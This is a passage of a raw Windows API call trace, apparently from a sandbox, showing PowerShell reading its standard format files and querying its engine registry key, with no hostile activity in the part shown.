	[0317.066] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0317.066] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0317.066] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xfdcda546, Data2=0x6166, Data3=0x463e, Data4=([0]=0x9c, [1]=0x27, [2]=0x51, [3]=0xef, [4]=0xf6, [5]=0xf7, [6]=0x42, [7]=0xf3))) returned 0x0
	[0317.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0317.067] SetErrorMode (uMode=0x1) returned 0x1
	[0317.067] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0317.067] GetFileType (hFile=0x304) returned 0x1
	[0317.067] SetErrorMode (uMode=0x1) returned 0x1
	[0317.067] GetFileType (hFile=0x304) returned 0x1
	[0317.067] ReadFile (in: hFile=0x304, lpBuffer=0x2ce1b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ce1b40*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.068] ReadFile (in: hFile=0x304, lpBuffer=0x2ce1b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ce1b40*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.068] ReadFile (in: hFile=0x304, lpBuffer=0x2ce1b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ce1b40*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.068] ReadFile (in: hFile=0x304, lpBuffer=0x2ce1b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ce1b40*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.068] ReadFile (in: hFile=0x304, lpBuffer=0x2ce1b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ce1b40*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.068] ReadFile (in: hFile=0x304, lpBuffer=0x2ce1b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ce1b40*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.068] ReadFile (in: hFile=0x304, lpBuffer=0x2ce1b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ce1b40*, lpNumberOfBytesRead=0x28ceb8*=0x119, lpOverlapped=0x0) returned 1
	[0317.068] ReadFile (in: hFile=0x304, lpBuffer=0x2ce1b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ce1b40*, lpNumberOfBytesRead=0x28ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0317.069] CloseHandle (hObject=0x304) returned 1
	[0317.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0317.069] SetErrorMode (uMode=0x1) returned 0x1
	[0317.069] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28ce60 | out: lpFileInformation=0x28ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0317.069] SetErrorMode (uMode=0x1) returned 0x1
	[0317.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0317.069] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cf48 | out: phkResult=0x28cf48*=0x304) returned 0x0
	[0317.069] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cecc, lpData=0x0, lpcbData=0x28cec8*=0x0 | out: lpType=0x28cecc*=0x1, lpData=0x0, lpcbData=0x28cec8*=0x56) returned 0x0
	[0317.070] CoTaskMemAlloc (cb=0x5a) returned 0x1b7e4740
	[0317.070] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce9c, lpData=0x1b7e4740, lpcbData=0x28ce98*=0x56 | out: lpType=0x28ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28ce98*=0x56) returned 0x0
	[0317.070] CoTaskMemFree (pv=0x1b7e4740) 
	[0317.070] RegCloseKey (hKey=0x304) returned 0x0
	[0317.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0317.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0317.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.071] VirtualQuery (in: lpAddress=0x28b9e0, lpBuffer=0x28c8a0, dwLength=0x30 | out: lpBuffer=0x28c8a0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.071] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x178cfac, Data2=0x6245, Data3=0x49e1, Data4=([0]=0x9b, [1]=0xee, [2]=0x80, [3]=0xd1, [4]=0xf, [5]=0x46, [6]=0x7d, [7]=0xa4))) returned 0x0
	[0317.071] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.071] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x12d4a477, Data2=0x5e24, Data3=0x4b05, Data4=([0]=0x80, [1]=0x3e, [2]=0xac, [3]=0x1a, [4]=0xef, [5]=0x24, [6]=0x3c, [7]=0xde))) returned 0x0
	[0317.072] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xae1febf, Data2=0x48b1, Data3=0x4dea, Data4=([0]=0xb3, [1]=0xc, [2]=0x6c, [3]=0xba, [4]=0x9, [5]=0x2d, [6]=0x39, [7]=0x65))) returned 0x0
	[0317.072] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xb25e6282, Data2=0x32c8, Data3=0x4f2a, Data4=([0]=0xba, [1]=0xc6, [2]=0x88, [3]=0x82, [4]=0x50, [5]=0xf0, [6]=0x2f, [7]=0x5d))) returned 0x0
	[0317.072] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.072] VirtualQuery (in: lpAddress=0x28bb20, lpBuffer=0x28c9e0, dwLength=0x30 | out: lpBuffer=0x28c9e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0317.072] SetErrorMode (uMode=0x1) returned 0x1
	[0317.072] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0317.072] GetFileType (hFile=0x304) returned 0x1
	[0317.072] SetErrorMode (uMode=0x1) returned 0x1
	[0317.073] GetFileType (hFile=0x304) returned 0x1
	[0317.073] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.073] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.073] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.073] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.073] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.073] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.073] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.074] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.074] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.075] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.075] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.075] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.075] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.076] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.076] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.076] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.077] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.077] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.078] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.078] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.078] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.078] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.078] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.078] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.079] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.079] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.079] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.079] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.079] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.080] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.080] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.080] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.082] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.082] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.082] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.082] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.083] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.083] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.083] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.084] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.084] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.084] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.084] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.084] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.084] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.084] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.085] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.085] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.085] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.085] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.085] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.085] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.085] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.085] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.086] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
